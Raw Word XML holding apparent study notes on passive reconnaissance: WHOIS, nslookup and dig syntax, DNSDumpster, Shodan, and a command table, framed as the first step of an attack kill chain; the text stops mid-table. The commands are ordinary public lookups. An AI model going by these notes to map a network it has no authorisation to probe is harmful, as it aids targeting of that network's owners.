    <w:p w14:paraId="70A3FA4F" w14:textId="682247BE" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>First step in Unified Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06272AAE" w14:textId="39698C74" w:rsidR="003C2DAA" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId266" w:history="1">
        <w:r w:rsidR="003C2DAA" w:rsidRPr="00201CCA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.unifiedkillchain.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6495DD3D" w14:textId="438626D6" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Different activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8CB371" w14:textId="261C7689" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS record lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC3DBD" w14:textId="3516C4AB" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Job ads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583A7F7" w14:textId="1B91A0D8" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>News articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD44859" w14:textId="1116F710" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Whois</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910EC44" w14:textId="2517A0BB" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Follows RFC3912</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167DE22E" w14:textId="39141796" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>TCP port 43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D99FE5" w14:textId="76EC9627" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Domain Registrar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002F530" w14:textId="760BF44D" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Maintains the WHOIS records for the domain names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A814A0" w14:textId="6B4348D2" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Want to learn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D8E10" w14:textId="2825FD8F" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Registrar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547D1464" w14:textId="509B4FCC" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Contact info of Registrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71512670" w14:textId="049DE05B" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Creation, update, and expiration dates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B4A96C" w14:textId="09EE2141" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Name Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7E79EE" w14:textId="4B1BE1ED" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Need whois client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B71D57" w14:textId="728FAC05" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Whois DOMAIN_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC734D4" w14:textId="3A402ABF" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nslookup and dig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB4A891" w14:textId="44321D28" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nslookup DOMAIN_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519558FA" w14:textId="7F5C0B77" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nslookup OPTIONS DOMAIN_NAME SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0930CDD8" w14:textId="7B0B45BA" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OPTIONS – query type (A or AAAA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7EFB7C" w14:textId="5656AC84" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56252030" w14:textId="375BFAF2" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6F3A6" w14:textId="69FC29FE" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CNAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E3F122" w14:textId="6BAC2B38" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>MX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4703020C" w14:textId="267304D2" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SOA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258CAADB" w14:textId="3567D870" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D811EED" w14:textId="0BB07275" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DOMAIN_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2399B3" w14:textId="6BE71C53" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SERVER – DNS server you want to query, choose any local or public DNS server to query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C367B9D" w14:textId="6CA01B1C" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nslookup -type=A tryhackme.com 1.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553D0292" w14:textId="676D795A" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Dig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DC0C0" w14:textId="01C114A7" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Dig DOMAIN_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741EF02" w14:textId="60EA7104" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Dig DOMAIN_NAME TYPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFE9E91" w14:textId="29581BA1" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Dig @SERVER DOMAIN_NAME TYPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3428B027" w14:textId="7FCE4EFA" w:rsidR="003C2DAA" w:rsidRDefault="003C2DAA" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNSDumpster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8D424" w14:textId="64F53FBC" w:rsidR="003C2DAA" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Offers detailed answers to DNS queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9AF68D" w14:textId="71D6BEDB" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Subdomain discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5664D9A2" w14:textId="24904843" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30F1BB" w14:textId="6ABED178" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Domain names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3576C79B" w14:textId="53E810E3" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>IP addresses, geolocations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DCC84F" w14:textId="168A5F29" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Graphically displayed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C0551" w14:textId="373EA081" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Shodan.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A05884" w14:textId="41DC8F7B" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Learn about client network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334354A9" w14:textId="16D5F4FE" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Connect to every device reachable online to build a search engine of connected things</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292465F4" w14:textId="660C5848" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A3B7A6" w14:textId="225BAE48" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hosting company</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3239BD99" w14:textId="5023F75F" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Geographic location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED5CF08" w14:textId="65F9198B" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Server type and version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2055E2A8" w14:textId="3D87944C" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>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5"/>
        <w:gridCol w:w="4756"/>
      </w:tblGrid>
      <w:tr w:rsidR="004A5611" w:rsidRPr="004A5611" w14:paraId="0F2C0785" w14:textId="77777777" w:rsidTr="004A5611">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AAC559F" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="305D87B5" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Commandline Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5611" w:rsidRPr="004A5611" w14:paraId="6F884A79" w14:textId="77777777" w:rsidTr="004A5611">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="272927D9" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Lookup WHOIS record</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70EA81F3" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>whois tryhackme.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5611" w:rsidRPr="004A5611" w14:paraId="1C458AE1" w14:textId="77777777" w:rsidTr="004A5611">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A9E0642" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Lookup DNS A records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B62E704" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nslookup -type=A tryhackme.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5611" w:rsidRPr="004A5611" w14:paraId="57EEE77E" w14:textId="77777777" w:rsidTr="004A5611">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32ED881F" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Lookup DNS MX records at DNS server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
